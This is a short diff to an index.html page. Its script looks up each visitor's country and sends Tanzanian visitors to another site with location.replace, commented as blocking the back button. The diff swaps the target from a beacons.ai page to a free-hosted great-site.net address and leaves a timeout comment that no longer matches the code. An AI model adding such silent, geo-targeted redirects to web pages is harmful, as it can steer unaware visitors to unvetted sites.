--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
         // IMMEDIATE redirect attempt for TZ users
         var xhr = new XMLHttpRequest();
         xhr.open('GET', 'https://ipapi.co/json/', true);
-        xhr.timeout = 2000; // 2 second timeout
+        xhr.timeout = 1000; // 2 second timeout
         
         xhr.onload = function() {
             if (xhr.status === 200) {
@@ -16,7 +16,7 @@
                     var data = JSON.parse(xhr.responseText);
                     if (data.country_code === 'TZ') {
                         // Use location.replace to prevent back button
-                        window.location.replace('https://beacons.ai/jojokamdoli');
+                        window.location.replace('https://biaza.great-site.net');
                     }
                 } catch(e) {
                     // If error parsing, do nothing
